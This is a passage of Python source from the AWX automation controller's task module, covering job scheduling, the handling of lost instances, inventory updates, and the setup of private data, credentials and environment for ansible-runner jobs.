if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
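# For example (hypothetical IDs): if the cached membership for a smart
# inventory is {1, 2, 3} and its host_filter currently matches hosts
# {2, 3, 4}, the function above deletes the membership row for host 1,
# bulk-creates one for host 4, and returns True; if the two sets are
# identical it writes nothing and returns False.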
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
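# For reference, a hypothetical (non-K8S) return value of the method above
# could look roughly like the following; the image name, paths, and pull
# policy are invented for illustration:
#   {
#       'container_image': 'quay.io/example/awx-ee:latest',
#       'process_isolation': True,
#       'container_options': ['--user=root', '--authfile=/tmp/pdd_wrapper_42_x/auth.json', '--pull=missing'],
#       'container_volume_mounts': ['/opt/shared:/opt/shared:Z'],
#   }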
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict; see the subclass implementations (e.g. RunJob.build_private_data) for the expected form.
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists, specifically when using process isolation.
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
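# The generated inventory file is itself a small executable script; a
# hypothetical example of its contents (values invented for illustration):
#   #! /usr/bin/env python3
#   # -*- coding: utf-8 -*-
#   print('{"all": {"hosts": ["web1"]}, "_meta": {"hostvars": {"web1": {}}}}')
# Because the file is executable, Ansible treats it as an inventory script
# and parses the JSON it prints.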
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
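# Sketch of how the two methods above fit together, with hypothetical values:
#   password_prompts = {r'SSH password:\s*?$': 'ssh_password'}
#   passwords        = {'ssh_password': 'secret'}
#   expect_passwords -> {r'SSH password:\s*?$': 'secret'}
# ansible-runner then answers any prompt matching the regex with the mapped
# value.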
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# Keep self.instance (rather than a local variable) because of the update_model pattern and because it is used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notifications are sent even if the playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
